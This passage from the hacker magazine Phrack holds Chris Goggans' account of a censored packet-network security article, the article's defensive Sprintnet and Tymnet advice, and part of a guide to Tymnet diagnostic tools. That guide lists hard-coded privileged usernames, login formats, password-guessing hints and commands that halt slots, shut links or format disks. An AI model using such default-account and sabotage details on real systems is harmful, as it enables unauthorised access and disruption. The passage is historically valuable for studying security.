- the past, and to explain the duties of such a group. He could not give
- me any answers.
-
- The group itself was obviously geared to be a type of kangaroo-court.
- It consisted of:
-
- William J. Cook -- The man who less than two years prior had ordered my
- privacy and civil rights violated by the Secret
- Service solely on the basis of two bulletin board
- posts and my association with members of the Legion
- of Doom and the Phrack Magazine staff.
-
- William H. Murray -- A senior consultant with Deloitte & Touche who had
- two weeks prior stood up before my presentation to
- the MIS Training Institute's 11th Annual Conference
- and said loudly "I can't take this any more, I'm leaving,"
- to the astounded audience. The man who went on to
- state in his own column in ISPNews, "Can we lie
- down with dogs and get up without fleas?" and "Ask
- yourself if you wish to work in a profession
- populated by rogues. Ask yourself if you want your
- reputation mixed with theirs."
-
- Winn Schwartau -- A security consultant with a broad view and an open
- mind, undoubtedly resulting from his background in the
- music industry, as opposed to the bean-counting world
- of MIS.
-
- David J. Stang -- Director of research, NCSA. Noted virus specialist.
-
- This was the group. Here is what they said about my article:
-
- Bill Cook -- "It's very well-written and informative, but shouldn't be
- published for legal reasons." (What those reasons might have been were
- not stated, nor did Mr. Cook return my call to his office.)
-
- Bill Murray -- Was not even given the file to read, as his response was
- deemed to predictable.
-
- Winn Schwartau -- "Publish it. This is valuable information."
-
- David Stang -- Was not given the file because, according to Len Spitz
- "David is just a virus expert, and this isn't in his arena, so we gave
- it to Ray Kaplan."
-
- Ray Kaplan -- Did not want to comment on it because he said, "It's
- not my expertise, so I gave it to a friend." I believe Ray did not
- want to get involved with anything having to do with hackers after
- the reactionary attitudes of the DECUS attendees towards his defense
- of Kevin Mitnik that nearly left him in bankruptcy. I cannot blame
- him at all. (Hell, I like the guy...he's certainly more brazen with
- attitude these days, I mean, he went to HoHoCon for God's-sake!)
-
- Ray's Friend -- "This is of absolutely no use to the information
- security professional, but of great use to the hacker community."
- I still do not know who Ray's "friend" was. I hope his
- Alzeheimer's has subsided since this comment.
-
- Needless to say, the article went unpublished.
-
- Shortly thereafter I received a letter from Robert Fox, an assistant
- vice-president at Sprint. Somehow my little article had snaked its
- way over to Kansas City. It's amazing how one faxed copy of an article
- could have reached so many people in such a short period of time.
- Mr. Fox had the following to say:
-
- ------------------------------------------------------------------------
-
- United Telecom/US Sprint
- 9221 Ward Parkway
- Kansas City, Missouri 64114
- 816-822-6262
-
- Robert F. Fox January 13, 1992
- Assistant Vice President
- Corporate Security
-
-
- VIA AIRBORNE EXPRESS
-
- Mr. Chris Goggans
- COMSEC
- Suite 1470
- 7322 Southwest Freeway
- Houston, TX 77074
-
- Re: Your Article "Packet-switched Networks
- Security Begins With Configuration"
-
- Dear Mr. Goggans:
-
- A copy of the referenced unpublished article, which is
- enclosed with this letter, has come to our attention. After
- review, we believe the article is inaccurate and libelous. If
- published the contents of the article could cause damage to Sprint
- customers, Sprint and our reputation, and we request that you not
- publish or otherwise disseminate it.
-
- In addition, we believe some of the information contained in
- the article has been obtained through violation of the property
- rights of Sprint and/or our customers and we demand that you cease
- any efforts or attempts to violate or otherwise compromise our
- property whether or not for you personal financial gain.
-
- Sincerely,
-
- Robert F. Fox
-
-
- Enclosure
-
-
- ------------------------------------------------------------------------
-
-
- Regardless of how Mr. Fox came into possession of this article, i have to
- question his letter based on his comments. First he states that
- the information is almost criminally incorrect and could cause harm to
- Sprint's reputation. Then he states that information in the article has
- come to be known through the violation of the security of Sprintnet and/or
- clients of Sprintnet. In effect, I am both a thief and a liar according
- to Mr. Fox. Well, if I were a thief the information could not possibly
- be inaccurate if it were obtained from Sprintnet or its clients. If I
- was a liar, why would they think the information came from themselves
- and/or their clients? Mr. Fox's thinly veiled threat caused me great
- amusement.
-
- I then decided no mainstream publication would touch this article. I
- don't know why everyone is so scared of the truth. Perhaps if the truth
- were known people would have to work, and perhaps if the truth were
- known some people would be out of work. None of this is of concern to
- me anymore. I am here to speak the truth and to provide uncensored
- information gathered from a variety of sources to provide readers of
- this magazine the facts they need to quench their thirst for knowledge.
-
- This article is included as a prelude to a series of articles all based
- on packet switched networks as related to information merely alluded to
- in my harmless little article. To our readers, "enjoy." To the cowering
- so-called security experts, "kiss my ass."
-
- ------------------------------------------------------------------------
-
- Packet-switched Networks
-
- Security Begins with Configuration
-
-
- For many companies the use of packet-switched networks has
- allowed for increased interconnectivity of systems and easy
- remote access. Connection to a major public packet-switched
- network brings increased access points with local dialups in
- many cities around the nation as well as access
- points from foreign countries.
-
- With the many obvious benefits provided by this service,
- improper configuration of either the host's connection to the
- network or of the network itself can lead to extreme security
- problems.
-
- The very connection to a public packet-switched network
- immediately increases the exposure of that particular system.
- America's two major commercial networks, BT-Tymnet and
- Sprintnet, are probably the most popular US targets for hackers
- around the world. The wealth of systems available on
- these two networks has provided hackers with a seemly endless
- supply of sites on which to sharpen their skills. The ease of use
- inherent in both networks makes them popular for legitimate
- users as well as illegitimate users.
-
- The Telenet software utilized in the Sprintnet network allows
- users to enter a network user address (NUA) in the standard
- format as outlined in the X.121 numbering standard:
-
- DDDDAAAHHHHHPP
-
- Where D = the four digit data network identifier code (DNIC)
- A = the three digit area code corresponding to the host
- H = the host address
- P = the port or (sub) address
-
- On domestic calls the DNIC for Sprintnet (3110) is stored in
- all Sprintnet equipment and is used as the default. By
- merely picking an area code, most often corresponding to the standard
- area codes of the North American Numbering Plan, and an
- additional one to five digits a would-be intruder can
- connect to any number of systems while looking for targets.
-
- In the past many software packages have been written to
- automate this process, and large scans of the network have
- been published in a variety of underground media.
-
- The Tymnet II software utilized in BT's Tymnet
- prompts the user for a mnemonic which corresponds to a host
- or number of hosts. The mnemonic, or username, is referenced
- to a fixed host address in the network's Master User
- Directory (MUD). This username may allow the caller to
- connect to a variety of sites, as opposed to merely one, by
- entering additional information in separate fields after the username.
- It may also correspond to a network gateway thereby allowing
- the user to enter a number in the X.121 format and connect to that
- specific site.
-
- This particular network, with its primary use of words as
- opposed to numbers, has been compromised by intruders who
- guess common words or names in their attempts to connect to
- remote sites.
-
- Each network has its own particular set of problems but
- solutions to these problems are both simple and quick in
- implementation.
-
- SPRINTNET
-
- The first deterrence in securing a host on this
- network is to restrict access to the site. This can be
- accomplished in a number of ways. The most obvious is to
- have the site refuse collect calls. All calls on Sprintnet
- are reverse-billed, unless the site has specifically asked
- that they not be billed for incoming calls. This makes the
- site accessible only through the use of a Network User
- Identifier (NUI).
-
- Another method of restricting access from intruders is to
- place the host in a closed user group (CUG). By electing to
- have the host in a CUG, the administrator can allow only
- certain NUIs to connect, and can also restrict the actual
- addresses from which access is allowed. For example: A site
- is placed in a CUG that will allow only calls from the
- company's remote branch in Dallas to access the host and only
- with the NUI created specifically for that branch. All
- attempts to access the site from an address outside the 214
- area will result in an error message indicating an invalid
- source address. All attempts to connect with an invalid NUI
- will result in an error indicating an invalid ID. This
- information is maintained in the networks main TAMS (TP
- Access Management System) database, and is not subject to
- manipulation under normal circumstances.
-
- Many sites on the Sprintnet network have specific
- subaddresses connecting to a debug port. This is usually at
- subaddress 99. All connections to debug ports should be
- restricted. Allowing users access to this port will allow
- them the ability to load and display memory registers of the
- Sprintnet equipment connected to the port, and even reset
- as well as enable or disable the host. Most debug ports are
- equipped with preset passwords from the vendor, but should be
- changed. These ports should also restrict connection from
- all addresses except those specified by the company.
-
- An additional measure that may foil intruders relying on
- software programs to find all addresses in a given area code
- is to request that the host be given an address above 10000.
- The time involved in scanning the network is extensive and
- most casual intruders will not look past the 10000 range. In
- fact, many will not venture past 2000.
-
- BT-TYMNET
-
- Any company having a host on the Tymnet network should choose
- a username that is not easily associated with the company or
- one that is not a common word or name. If an intruder is aware that
- XYZ Inc. has a UNIX based system on TYMNET he or she would
- begin attempts to find this system with the obvious
- usernames: XYZ, XYZINC, XYZNET, XYZ1, XYZUNIX, UNIX, etc.
-
- BT-Tymnet allows for these usernames to have additional
- password security as well. All hosts should have this option
- enabled, and passwords should be changed frequently.
- The password should always be a minimum of six
- digits, should include letters, numbers and at least one symbol
- character, and should not be associated in any way with the
- corresponding username.
-
- Many clients of BT-Tymnet have purchased the Tymnet II
- software and have individual sub-networks that are linked to
- the public network through gateways. Each subnet is
- personally configured and maintained through the use of a
- package of utilities provided by Tymnet. These utilities
- each perform a specific task and are highly important to the
- smooth operation of the network. These utilities may be
- accessed either directly from the host-end or remotely
- through the network by entering a corresponding username.
- Some of these utilities are:
-
- XRAY : a monitoring utility
- DDT : a debugging utility
- NETVAL : a database of username to host correspondence
- PROBE : a monitoring utility
- TMCS : a monitoring utility
-
- Under NO CIRCUMSTANCES should these utilities be left
- without a password on the company's subnet. These utilities should
- also never be named similarly to their given name. Should an
- intruder gain access to any of these utilities the integrity
- of your network will be at risk.
-
- For example:
-
- Allowing an outsider access to the XRAY utility, would give
- he or she the ability to monitor both incoming and outgoing
- data from the host using the "TA" command (display trace data
- table in ASCII). Use of certain XRAY commands are restricted
- by a security function that allows only certain usernames to
- execute commands on the basis of their existence in a
- "Goodguy" list, which can be displayed by any XRAY user.
- Should a user be of the highest privilege, (2), he or she can
- add or delete from the "Goodguy" list, reset connections, and
- display trace data on channels other than the default
- channel.
-
- Allowing a user access to DDT can result in complete
- disruption of the network. DDT allows the user the ability
- to write directly to the network controller "node code" and
- alter its configuration.
-
- Allowing a user access to NETVAL will allow the user to
- display all usernames active on the network and the
- corresponding host addresses.
-
- OTHER PROBLEMS
-
- EXAMPLE ONE
-
- On many networks users have the ability to connect to the
- packet assembler/disassembler (PAD) of the network dial-ups.
- This has led to significant problems in the past.
-
- In the mid-1980's two American hackers were exploring the
- German packet network DATEX-P. One connected to a host in
- Berlin and was immediately disconnected by the remote site.
- Before the hacker could react, the German host connected to
- the NUA corresponding to his Sprintnet PAD and sent him a
- login prompt. This alarmed the hacker greatly, as he assumed
- that the proprietors of the German host had somehow noticed
- his attempt to access their system. He contacted his partner
- and told him of the occurrence. The two concluded that since
- the NUA of the origination point is sent in the packet-header,
- the remote site must have been programed to recognize the NUA and
- then return the call. The fact that it had returned a call to a
- public PAD was intriguing to the pair, so they decided to
- attempt to recreate the event by calling each other. Both
- individuals connected to the network and one entered the NUA
- corresponding to the others PAD. A connection resulted and
- the two were able to interact with one another. They then
- decided that they would periodically meet in this fashion and
- discuss their findings from Germany. At the time of the next
- meeting, the connection did not occur as planned. One hacker
- quickly received a telephone call from the second who
- exclaimed rather excitedly that he had attempted to connect
- to his partner as planned, but accidentally connected to
- another PAD and intercepted a legitimate user typing his NUI.
- Further investigation proved that one could connect to public
- PADs during the idle period when the user was in network
- mode, prior to making a connection to a remote site. This
- discovery was intended to remain secret, because of its
- extremely dangerous applications. Nevertheless, word of this
- discovery soon reached the entire hacker community and what
- came to be known as "PAD to PAD" was born.
-
- The "PAD to PAD" technique became so wide-spread that hackers
- were soon writing software to intercept data and emulate
- hosts and capture login names and passwords from unsuspecting
- network users. Hackers were intercepting thousands of calls
- every day from users connecting to systems ranging from
- banking and credit to the Fortune 500 to government sites.
-
- After nearly two years of "PAD to PAD" Sprintnet became
- alerted to the crisis and disallowed all connections to
- public PADs. When Sprintnet expanded its service overseas
- they once again left access to the overseas PADs
- unrestricted. The problem went unnoticed again until
- their attention was brought to it by a hacker who called
- Sprintnet security and told them that they ought to fix it
- quickly before it became as wide-spread as before.
- The problem was resolved much quicker this time.
-
- This particular technique was not limited to Sprintnet. All
- networks using the Telenet software are at risk to this type
- of manipulation. This type of network manipulation was
- integral in the recent compromise of a large Bell Company's packet
- network in a much-publicized case. Certain foreign
- networks in countries such as Israel, England, Chile, Panama,
- Peru and Brazil are also at risk.
-
- EXAMPLE TWO
-
- In the late 1980's hackers stumbled onto a packet network
- owned and maintained by a large facilities maintenance
- company. This particular network had a huge flaw in its
- setup. It connected all calls placed through it as if they
- were placed with an NUI. This allowed hackers to place calls
- to addresses that refused collect connections on networks
- around the world. This became a popular method for hackers
- to access underground chat systems in Europe. Additionally,
- this network contained a score of computers belonging to a
- major automobile manufacturer. Most of these systems were
- highly insecure. The network also allowed unrestricted
- access to network debug ports. This particular network also
- had a toll-free number on an MCI exchange. At the time, MCI
- was having some difficulty getting their equipment to accept
- the ANI information to provide customers with a full call-
- detail report on their monthly statement. The hackers were
- well aware of this fact and made frequent use of the network
- with no fear of prosecution. Eventually MCI was able to fix
- their translation problem and were able to provide their
- clients with full call-detail reports. When this was
- learned, many hackers abandoned use of the network, but
- several others were later prosecuted for its usage when their
- number turned up on the bill.
-
- EXAMPLE THREE
-
- Until quite recently intimate knowledge of the utilities
- driving various packet-switched networks were known by an
- exclusive few. While investigating a network owned by an
- extremely large Cleveland-based conglomerate hackers came
- across a system where documentation on the usage of every
- utility was kept online. The hackers quickly downloaded all
- the information and it soon became somewhat wide-spread among
- the underground community. With less-skilled and more
- unscrupulous individuals in possession of this information
- many networks began experiencing disruptions and system
- integrity was quickly lost as hackers began monitoring data
- traffic.
-
- No information on the usage of packet networks or their
- utilities should ever be kept online. Hard copies should be
- kept in the possession of the network administrator, and when
- updated, obsolete versions must be destroyed.
-
- WHAT TO DO
-
- When a security violation stemming from a connection through
- the packet network is noticed, Network Security should be
- notified. Clients of BT-Tymnet should notify Steve Matthews
- at 408-922-7384. Clients of Sprintnet should notify
- Pat Sisson at 703-689-6913.
-
- Once changes have been enacted in the network to prevent
- further break-ins, the host computer should be checked
- thoroughly for any changes or damages, and all individual
- account passwords should be changed.
-
- CONCLUSION
-
- It is critical that the packet network be configured properly
- and that all measures are taken to ensure its security. Even
- the most secure host computer can be easily compromised if it
- is connected to an insecure packet network.
- ----------------------------------------------------------------------
-
-
- ==Phrack Magazine==
-
- Volume Four, Issue Forty-Two, File 5 of 14
-
- = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = -
-
- Synopsis of Tymnet's Diagnostic Tools
- and their associated
- License Levels and Hard-Coded Usernames
-
- by
- Professor Falken
-
- February 14, 1993
-
- = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = -
-
-
- While the scope of this article is general, the information contained
- within is NOT for the novice Tymnet explorer. Novice or NOT, go ahead
- and read; however, caution should be taken when invoking any of these
- commands upon BT's network. Execution of certain commands can have
- debilitating consequences upon segments of the network.
-
- In this article I intend to educate the reader about the various
- Tymnet diagnostic utilities that are available. This article is by no
- means an in depth microscopic view of the utilities; but rather a brief to
- the point survey course of what is available to qualified people. With
- each utility I will describe its use/s, list its major commands, and
- in DDT & XRAY's case, dispense its hard-coded usernames which allow you to
- become a 'qualified person.'
-
- It seems the software engineers at Tymnet (for the lack of something
- better to do) like to rename ordinary words to complicated ones. For
- instance, within this article I will talk about LICENSE LEVELS. License
- levels are nothing more than security levels. When I speak of License
- Level 4, just translate that to Security Level 4. I would have just called
- everything security levels, but I wanted to stay within that lethargic
- Tymnet mood for realism purposes. Another word the engineers pirated from
- 'GI JOE' was GOOD-GUYS. In our world, a Good-Guy is a valid username that
- can be used for logging into the various diagnostic utilities.
-
- Like most conventional computers, Tymnet also needs an operating system
- for its code to run under. Tymnet's node-level, *multitasking*, operating
- system is called ISIS; it stands for 'Internally Switched Interface System.'
- Its designed for: handling multiple communication links, allocating system
- memory, system job/process scheduling, and all the other BASIC things ALL
- operating systems do. Tymnet explains it a bit more complicated and less
- to the point, but to give equal time to the opposing viewpoint, this is
- what they say:
-
- "Internally Switched Interface System. The operating system for a TYMNET
- node; provides functions that control the overall operation of an
- Engine. These functions include, but are not limited to, memory
- allocation, message switching, job scheduling, interrupt processing,
- and I/O distribution. ISIS allows multiple data communications
- functions to run on a single processor. Two of its many services are
- debugging and I/O port management. Formerly known as ISIS-II or ISIS2.
- ISIS2, ISIS-II Obsolete terms. See Internally Switched Interface
- System (ISIS)."
-
- At various points within this file I will refer to an ENGINE.
- Basically, an ENGINE is a minicomputer which handles all the processing
- requirements that ISIS and its applications demand. However, to be fair to
- all the Tymnet technoids, this is what BT says:
-
- "BT North America packet-handling hardware. The Engine communications
- processor is a member of a family of special-purpose minicomputers.
- It runs communications software such as Node Code (for switching),
- slot code (for protocol conversion and value-added functions), and
- the ISIS operating system. The Engine family consists of the
- Pico-Engine, Micro-Engine, Mini-Engine, Mini-Engine-XL,
- Dual-Mini-Engine-XL, Engine, and ATC."
-
- You think they would have invented much NEATER names for their computer
- platforms than 'Mini-Engine' or 'Micro-Engine'. I would guess that BT's
- hardware engineers have less time than the software engineers to invent
- K-RAD names for their projects. Anyhow, as you can see, the ENGINE is the
- muscle behind Tymnet's network brawn.
-
- Another term which is very basic to ANY understanding of Tymnet is the
- 'SUPERVISOR.' As you can see the engineers searched high & low for this
- clever term. The Supervisor is many things including, the authentication
- kernel you interact with, the circuit billing system that subscribers
- unfortunately do not interact with, and generally the network's 'BIG BROTHER.'
- Supervisor watches the status of the network at all times, keeping detailed
- logs and interceding when trouble erupts. The supervisor term can also
- refer to the engine upon which the Supervisor is being run on.
-
- With all that in mind, I will now introduce five of Tymnet's diagnostic
- tools. I intend on presenting them in this order: DDT, MUX, PROBE, LOAD-II,
- TOM, and XRAY. Please note that only DDT and XRAY have 'good-guy' lists
- provided.
-
- DDT - Dynamic Debugging Tool
- ----------------------------
-
- DDT is a utility which runs under the ISIS operating system. DDT is
- capable of loading or displaying a slot's content. A slot is an area of
- memory in a node in which Tymnet applications run. DDT can also be used
- for modification of a specific slot's slot code. Slot code is any
- program which has been assigned memory within the engine by ISIS. DDT also
- performs other lower level diagnostic functions, which I will not go into.
-
- Logging into DDT requires you to provide the 'please log in:' prompt
- a valid username and password. Upon checking the good-guy list and
- authenticating the user, the kernel process searches for the associated
- slot assignment. If no slot is assigned to the good-guy, the kernel will
- prompt you for a slot number. Once you enter a VALID slot number and it is
- available, the authentication kernel executes the DDT utility. When I say
- 'VALID' slot number, I mean a slot number which logically exists AND is
- attainable by your current good-guy's license level.
-
- Actual logins to DDT take the form:
-
- please log in: goodguyID:host# <cr>
- password:
-
- Where goodguyID is a valid goodguy, host# is the Tymnet subscriber who
- needs a little 'work' done, and obviously the password is what it is. While
- I would like to give you all the passwords I could, I don't think it is
- going to happen. So all I can do is suggest trying different variations
- of the goodguy IDs, and other dumb passwords unsecure people use.
-
- Connection to primary DDT is displayed as the ever-so-friendly '*' prompt.
- It is from this prompt that all general DDT commands are directed. The most
- useful DDT commands are listed below in a general, extended, and RJE/3270T
- specific registry.
-
-
- GENERAL DDT COMMANDS
- --------------------
-
- E Execute a slot.
- H Halt a slot. <---- DESTRUCTIVE See WARNING!
- ZZ Logs you out of DDT.
- ^# Transfers control from the current slot to the slot
- specified by #. (IE- ^7 Switches control to slot 7)
- ?CPU Displays CPU utilization (Engine Performance)
- ?HIST Displays a history of diagnostic messages.
- ?HOST Displays the hosts in use by that slot.
- ?LU Displays the logical unit to physical device assignment.
- ?MEM Displays the time of memory errors if any.
- ?STAT Allows the execution of EXTENDED DDT. To obtain the extended
- command prompt type '/'.Command prompt ':>'
- ?VERN Displays the ISIS version followed by the SLOT's version.
-
-
- WARNING!: It is possible to HALT a slot accidently. This will freeze
- everything going in/out of the current slot. This can be BAD
- for customer satisfaction reasons. If you accidently hit 'H',
- even without a CR/LF it will hang the slot. So when the ?HIST or
- ?HOST commands are used make SURE you type that important '?'
- beforehand. This will halt everything going over that slot,
- effectively destroying the communication link.
-
-
- EXTENDED COMMANDS FOR RJE & 3270T
- ---------------------------------
-
- RJE & 3270T
- ===========
- EXI Logs you out. (DuH!)
- QUIT Return from extended DDT prompt ':>' to normal '*' DDT prompt.
-
- RJE Only
- ========
- HELP Displays a list of commands available in extended RJE DDT mode.
- (A list not worth putting in here.)
- SCOPE Outputs a protocol trace.
- TRACE Outputs a state trace.
-
- 3270T Only
- ==========
- HELP Displays a list of commands available in extended 3270T DDT mode.
- (Again, a list not worth putting in here.)
- STATUS Displays status of all lines, control units, and devices.
- STRTLN x Start polling on line x. (Performance benchmark)
- STRTCU x,y Start polling control UNIT x on LINE y. (Performance benchmark)
- STOPLN x Stop polling on line 'x'
- STOPCU x,y Stop polling control UNIT x on LINE y.
-
- NOTE:If you try to use an RJE command while logged into a 3270T you will
- be shown the incredible "ILLEGAL COMMAND" string.
-
-
- GOOD-GUYS AND LICENSE LEVELS
- ----------------------------
-
- As with any username, there is an accompanying license level (security
- level) with each account. The different levels define which types of
- slots that username may access and the available commands. Some of the
- good-guys have access to all slots including supervisor, while others
- have access to only non-supervisor slots.
-
- The table below is a list of the actions that are available with the
- various different license levels.
-
- L.DISC Permits disk formatting
- L.H Permits the halting, loading, and restarting of all slots for
- code-loading purposes.
- L.P Permits the halting, restarting, and online software modification
- to an active slot. (Except slots 0 and FF)
- L.R Permits logon to all slots (Except 0 and FF)
- L.SOA Permits logon to a node's slot 0. (Node configuration.)
- L.SOP Permits the halting, restarting, and online software modification
- to slot 0.
- L.SOR Permits the reading of slot 0 files.
- L.SUA Permits logon to Supervisor slots.
- L.SYA Permits logon to a node's FF slot. (ISIS configuration node.)
- L.SYR Permits the reading of slot FF files.
- L.SYP Permits the halting, restarting, and online modification to
- slot FF.
-
- The DDT license levels are numbered from 0 to 4, 4 being Gh0D. Each level
- has several of the above named actions available to them. Listed below are
- the various actions available at the 0 through 4 license levels.
-
- LEVEL ACTIONS
- ===== =======
- 4 L.DISC, L.P, L.SOA, L.SOP, L.SUA, L.SYA, and L.SYP .
- (Disk format, halt, restart, online software mods, and reading
- of files for all slots AND supervisors. Like I said, GOD.)
-
- 3 L.P, L.SOA, L.SOP, L.SYA, and L.SYP .
- (Halt, restart, online software mods, and reading of files for
- all slots and supervisors.)
-
- 2 L.H, L.R, L.SOA, L.SOR (For code loading purposes: halt, restart
- online software mods, and reading files for all slots and
- supervisor nodes.)
-
- 1 L.R, L.SOA, L.SYA (Views ALL slots and supervisor nodes)
-
- 0 L.R (Views all slots, EXCEPT supervisor slots and 0 & FF.)
-
- What follows is a good-guy userlist with the associated license level
- of that username. I also note whether the account is ACTIVE/PASSIVE upon
- an operating node/slot combination and the seriousness of the network
- impact that those associated licenses can possibly create.
-
- LICENSE LEVEL GOOD GUY USERNAME ACTIVE/PASSIVE NETWORK IMPACT
- ============= ================= ============== ==============
- 4 ISISTECH Active MAJOR
- 4 NGROM Active MAJOR
- 4 NSSC Active MAJOR
- 4 RPROBE Active MAJOR
- 4 RERLOG Active MAJOR
- 4 RACCOUNT Active MAJOR
- 4 RSYSMSG Active MAJOR
- 4 RUN2 Active MAJOR
- 4 TNSCM Active MAJOR
-
- 3 IEXP Active Moderate
- 3 ISERV1 Active Moderate
- 3 ISERV2 Active Moderate
- 3 ISERV3 Active Moderate
- 3 ITECH1 Active Moderate
- 3 ITECH2 Active Moderate
- 3 ITECH3 Active Moderate
- 3 ITECH4 Active Moderate
- 3 ITECH5 Active Moderate
-
- 2 GATEWAY Active Minor
-
- 1 DDT Passive
- 1 DDTECH Passive
- 1 IOPPS Passive
- 1 ISERV Passive
- 1 ITECH Passive
-
- 0 VADICBUSY Passive
-
-
- MUX - The Circuit Multiplexer
- -----------------------------
-
- MUX is a tool which also runs within an ISIS slot. MUX allows the
- building, interconnecting, and controlling of several sets of circuits from
- a single terminal. Instead of logging in and out of each diagnostic
- tool as different commands are needed, MUX is used to create multiple
- concurrent circuits. Once these are set up, it is easy to switch back
- and forth between different diagnostic applications, WITHOUT having to
- logoff one before logging into another. Tymnet also likes to boast that
- you can chat with other users on MUX's 'Talk mode facility.' I'll stick
- to IRC until this catches on.
-
- Logging into MUX is quite simple. It takes the form of:
-
- please log in: userid <cr>
- password:
-
- NOTE: ATTN commands, see CHAR command.
- ATTN ATTN Allows you to send one attention character down the circuit.
- ATTN C x Labels the current port, where 'x' is the label you desire.
- ATTN E Allows you to switch to the next port you have defined.
- This command however is not valid from the command mode.
- The circuit label is presented and connection is made.
- Even though the prompt for that circuit is not presented,
- you ARE connected.
- ATTN Z Returns you to the command mode.
-
- CHAR char Configures your ATTN character to 'char'. So in the below
- ATTN commands, you will have to enter your ATTN character
- then the proceeding character. The default ATTN Character
- is CTRL-B. Personally, I like to set mine to '!'.
- CONNECT pl1,pl2 Connect the output of port label-1 to port label-2.
- Usually your current port label is marked with a * preceding
- it in a 'LIST', this is also known as a BOSS.
-
- ENABLE pl Enables a pl's (port labels) output.
- EXIT Leave MUX with all your circuits INTACT.
-
- FLUSH pl Flush pl's (port labels) output.
- FREEZE N/F Freeze (N=ON or F=OFF) current Boss.
-
- GREETING msg Sets up the greeting message.
-
- HEAR N/F Allow (N=ON or F=OFF) users to 'TALK' to each other.
- HELP Prints help messages. (ooof)
-
- LIST Lists all active ports for the current user. (ATTN Z L)
- LABEL N/F Labeling (N=ON or F=OFF) of all output sent to the Boss.
-
- MAKE Make a new circuit by logging onto a diagnostic tool.
- You will be prompted with the omnipresent 'Please log in:'
- prompt. Just login as usual for particular tool.
- MESSAGE Print last message.
-
- QUIT Leave MUX and ZAP all circuits created.
-
- SEND pl Send to pl (port label).
-
- TALK username Talks to 'username' providing HEAR=N.
- TIME Outputs date and time in format: 31Dec93 05:24
- TRANSFER pl Transfers control of this BOSS to pl (port label).
-
- ZAP pl Zap any circuits you made, where 'pl' is the port label.
- This command defaults to the port labeled '*' (Boss).
- This command is ONLY valid in command mode.
-
- PROBE
- -----
-
- PROBE is probably one of the BEST known Tymnet diagnostic tools.
- PROBE is actually a sub-program of the Supervisor. PROBE is capable of
- monitoring the network, and it has access to current pictures of
- network topology, including host tables and node descriptors. PROBE
- shares common memory with the Supervisor and has circuit tracing
- capability. PROBE can be used to check the history of nodes & links,
- boot a node, trace a circuit, and reset a link or shut one down.
- PROBE can be access directly or through TMCS (Tymnet Monitoring
- and Control System.)
-
- To access PROBE from within TMCS you would enter the command:
-
- PROBE s Where 's' is the active or 'sleeping' supervisor.
-
- For more PROBE related TMCS commands or general TMCS commands, please
- refer to an appropriate source. If the demand is great enough, perhaps I
- will release a TMCS reference sheet in the future.
-
- PROBE access is determined by the sum of the individual license
- levels granted to the user. PROBE licenses are as follows:
-
- License Description
- ------- -----------
- 00 Permits view only commands -- user is automatically logged off
- from PROBE after 20 minutes of no activity.
- 04 Permits view only commands -- no automatic logoff.
- 20 Permits all 00 commands plus ability to effect changes to
- network links.
- 10 Permits ability to effect changes to node status.
- 01 Permits ability to effect changes to network supervisors.
- 02 Permits ability to effect changes to supervisor disks.
-
- I do not have any hardcoded usernames for PROBE with this exception.
- The PROBE access username 'PROBE' is hardcoded into the supervisor,
- and usually each host has one hardcoded PROBE username: CONTROL -- license
- level 37. So in comparison with the above chart, CONTROL has Gh0d access
- to PROBE commands, because everything added up equals 37 (duh). On many
- subnets, the username RPROBE has similar access.
-
- PROBE COMMANDS
-
- Command Lic. Lvl Description
- ------- -------- -----------
- CHANGE 00/04 Changes your PROBE personal password.
- EXI 00/04 Logout.
- HELP 00/04 Help. (Temple of Sub-Genius)
- SEND x text 00/04 Sends message to Probe user whose job label is 'x'.
- VERSION 00/04 Lists current software version number.
- WHO 00/04 Lists currently logged in PROBE users. (Useful)
-
- DISPLAY CMDS:
- Command Lic. Lvl Description
- ------- -------- -----------
- ACCT 00/04 Displays # of accounting blocks on Supervisor disk
- available for RAM session record data.
- AN 00/04 Displays detailed information about active nodes.
- ASTAT 00/04 Displays number of login and circuit building
- timeouts.
-
- AU 00/04 Displays node numbers of ALL active nodes that are up.
- CHAN x 00/04 Displays port number used by Supervisor for command
- circuit to node 'x'.
- COST x 00/04 Displays cost of building command circuit to node 'x'.
- CSTAT 00/04 Displays time, login, rate, and network status every
- 15 seconds.
- EXC O|S|P 00/04 Displays links that are overloaded (O), or shut (S),
- or out of passthroughs (P).
- HOST x 00/04 Displays information about host 'x' or all hosts.
- LACCT 00/04 Displays number of last accounting block collected
- by RAM session record data.
- LRATE 00/04 Displays Supervisor login rate in logins per min.
- LSHUT 00/04 Displays shut links table.
- LSTMIN 00/04 Displays circuit status information gathered by
- Supervisor during preceding minute.
- N x 00/04 Displays status info about node 'x'.
- OV x 00/04 Displays overloaded links.
- PERDAT 00/04 Displays Supervisor performance data for preceding min.
- RTIME 00/04 Reads 'Super Clock' time and displays year, and
- Julian date/time.
- STAT 00/04 Displays network status information.
- SYS 00/04 Displays host number running PROBE.
- TIME 00/04 Displays Julian date and network time.
- TSTAT 00/04 Displays same information as STAT, preceded by
- Julian date/time.
- VERSION 00/04 Displays current versions of PROBE and Supervisor
- software.
- WHO 00/04 Displays active PROBE users and their job labels.
-
- LOG MESSAGE CMDS:
- Command Lic. Lvl Description
- ------- -------- -----------
- LOG 00/04 Outputs network information from Supervisor log.
- REPORT 00/04 Controls output of node reports.
- RLOG m1..m4 00/04 Restricts log output to up to four message numbers.
- M1- 1st Message, M2- 2nd Message, etc.
- RNODE n1 n2 00/04 Restricts log output to messages generated at nodes
- N1 and N2.
-
- NETWORK LINK CMDS:
- Command Lic. Lvl Description
- ------- -------- -----------
- CSTREQ n1 n2 20 Requests total speed of all lines on specified
- link. (n1= 1st Node n2= 2nd Node)
- ESHUT n1 n2 20 Shuts specified link and enters it on shut links
- table. (n1= 1st Node n2= 2nd Node)
- PSTAT n Hhost p 20 For node 'n', displays status of logical ports
- for port array 'p' on 'host'. Note the capital
- 'H' must precede the host specific.
- RSHUT n1 n2 20 Opens specified link and removes it from shut
- links table.
- SYNPRT n 20 Displays status of async ports on node 'n'.
- TRACE n Hhost p 20 Traces specified circuit. Where 'n' is node,
- or n Sp 20 'host' is HOST, and 'p' is port. Or for secondary
- command: 'n' node name, 'p' port. Again, 'S' must
- precede the port name.
- T2BORI n1 n2 20 Resets communication channel between node n1 and
- node n2.
-
- NETWORK NODE CMDS:
- Command Lic. Lvl Description
- ------- -------- -----------
- CLEAR n 10 Opens all links on node 'n'.
- DLOAD n 10 Causes node 'n' to execute its downline load
- bootstrap program.
- NSHUT n 10 Shuts all links on node 'n'.
- RETAKE n 10 Causes Supervisor to release and retake control
- of node 'n'.
